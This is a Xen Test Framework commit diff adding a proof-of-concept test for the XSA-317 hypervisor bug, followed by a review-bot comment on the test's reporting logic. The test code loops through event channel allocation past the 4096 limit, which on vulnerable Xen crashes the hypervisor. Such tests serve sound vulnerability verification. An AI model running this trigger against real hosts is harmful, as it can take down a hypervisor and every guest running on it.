From: Julien Grall Date: Tue, 7 Jul 2020 10:54:49 +0000 (+0100) Subject: XSA-317 PoC X-Git-Url: http://xenbits.xensource.com/gitweb?a=commitdiff_plain;h=ba5923110c2f562170b82f955d9ace70f6a4a8e2;p=xtf.git XSA-317 PoC Signed-off-by: Julien Grall Signed-off-by: Andrew Cooper --- diff --git a/docs/all-tests.dox b/docs/all-tests.dox index 15eeccd..8eed0cf 100644 --- a/docs/all-tests.dox +++ b/docs/all-tests.dox @@ -150,6 +150,8 @@ states. @subpage test-xsa-316 - Bad error path in GNTTABOP_map_grant. +@subpage test-xsa-317 - Incorrect error handling in event channel port allocation. + @section index-utility Utilities diff --git a/include/xen/event_channel.h b/include/xen/event_channel.h index 62ee95a..bef0f46 100644 --- a/include/xen/event_channel.h +++ b/include/xen/event_channel.h @@ -1,12 +1,22 @@ #ifndef XEN_PUBLIC_EVENT_CHANNEL_H #define XEN_PUBLIC_EVENT_CHANNEL_H +#include + #define EVTCHNOP_send 4 +#define EVTCHNOP_alloc_unbound 6 #define EVTCHNOP_init_control 11 #define EVTCHNOP_expand_array 12 typedef uint32_t evtchn_port_t; +struct evtchn_alloc_unbound { + /* IN parameters. */ + domid_t dom, remote_dom; + /* OUT parameters. */ + evtchn_port_t port; +}; + struct evtchn_init_control { /* IN parameters. */ uint64_t control_gfn; diff --git a/include/xtf/xenbus.h b/include/xtf/xenbus.h index 3ed77d5..76fa739 100644 --- a/include/xtf/xenbus.h +++ b/include/xtf/xenbus.h @@ -2,6 +2,7 @@ #define XTF_XENBUS_H #include +#include #include #include diff --git a/tests/xsa-317/Makefile b/tests/xsa-317/Makefile new file mode 100644 index 0000000..f930b03 --- /dev/null +++ b/tests/xsa-317/Makefile @@ -0,0 +1,11 @@ +include $(ROOT)/build/common.mk + +NAME := xsa-317 +CATEGORY := xsa +TEST-ENVS := $(ALL_ENVIRONMENTS) + +TEST-EXTRA-CFG := extra.cfg.in + +obj-perenv += main.o + +include $(ROOT)/build/gen.mk diff --git a/tests/xsa-317/extra.cfg.in b/tests/xsa-317/extra.cfg.in new file mode 100644 index 0000000..0cae09a --- /dev/null +++ b/tests/xsa-317/extra.cfg.in 
@@ -0,0 +1 @@
+max_event_channels=4096
diff --git a/tests/xsa-317/main.c b/tests/xsa-317/main.c
new file mode 100644
index 0000000..8d52746
--- /dev/null
+++ b/tests/xsa-317/main.c
@@ -0,0 +1,60 @@
+/**
+ * @file tests/xsa-317/main.c
+ * @ref test-xsa-317
+ *
+ * @page test-xsa-317 XSA-317
+ *
+ * Advisory: [XSA-317](https://xenbits.xen.org/xsa/advisory-317.html)
+ *
+ * This vulnerability affects:
+ * - HVM and 32-bit PV guests allowed to use more than 1024 event channels.
+ * - 64-bit guests allowed to use more than 4096 event channels.
+ *
+ * The testcase will try to allocate more than 4096 event channels. On
+ * vulnerable platform, Xen will fall over a NULL evtchn bucket pointer.
+ *
+ * @see tests/xsa-317/main.c
+ */
+#include
+
+const char test_title[] = "XSA-317 PoC";
+
+void test_main(void)
+{
+ unsigned int i;
+ struct evtchn_alloc_unbound ub = {
+ .dom = DOMID_SELF,
+ .remote_dom = 0,
+ };
+
+ /*
+ * Create more event channels than the 4096 ABI limit. A fixed Xen, or
+ * not vulnerable configuration, should fail with -ENOSPC eventually.
+ */
+ for ( i = 0; i < 4100; ++i )
+ {
+ int rc = hypercall_event_channel_op(EVTCHNOP_alloc_unbound, &ub);
+
+ if ( rc == -ENOSPC )
+ break;
+
+ if ( rc )
+ return xtf_error("Error: Unexpected alloc_unbound error %d\n", rc);
+ }
+
+ /*
+ * If Xen is still alive, it didn't fall over a NULL evtchn bucket
+ * pointer.
+ */
+ xtf_success("Success: Not vulnerable to XSA-317\n");
+}
+
+/*
+ * Local variables:
+ * mode: C
+ * c-file-style: "BSD"
+ * c-basic-offset: 4
+ * tab-width: 4
+ * indent-tabs-mode: nil
+ * End:
+ */
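Review bot: In test_main(), the `rc == -ENOSPC` break goes straight to `xtf_success()` however early it fires, so a run where the `max_event_channels=4096` setting from extra.cfg.in never took effect is reported as "Not vulnerable" exactly like a fixed hypervisor. The comment above the loop groups "fixed Xen" and "not vulnerable configuration" together, but the log gives an operator no way to tell which one they got. Printing where allocation stopped, for example `printk("alloc_unbound: -ENOSPC after %u ports\n", i);` just before the `break`, would make a pass auditable against the 1024/4096 limits named in the file header. Likewise, if all 4100 calls return 0 the loop falls through to success even though the comment expects -ENOSPC eventually; that case may deserve an `xtf_warning()` rather than a silent pass. A one-line comment in extra.cfg.in tying 4096 to the loop bound would also help, since lowering it would appear to turn the test into a no-op that still reports success.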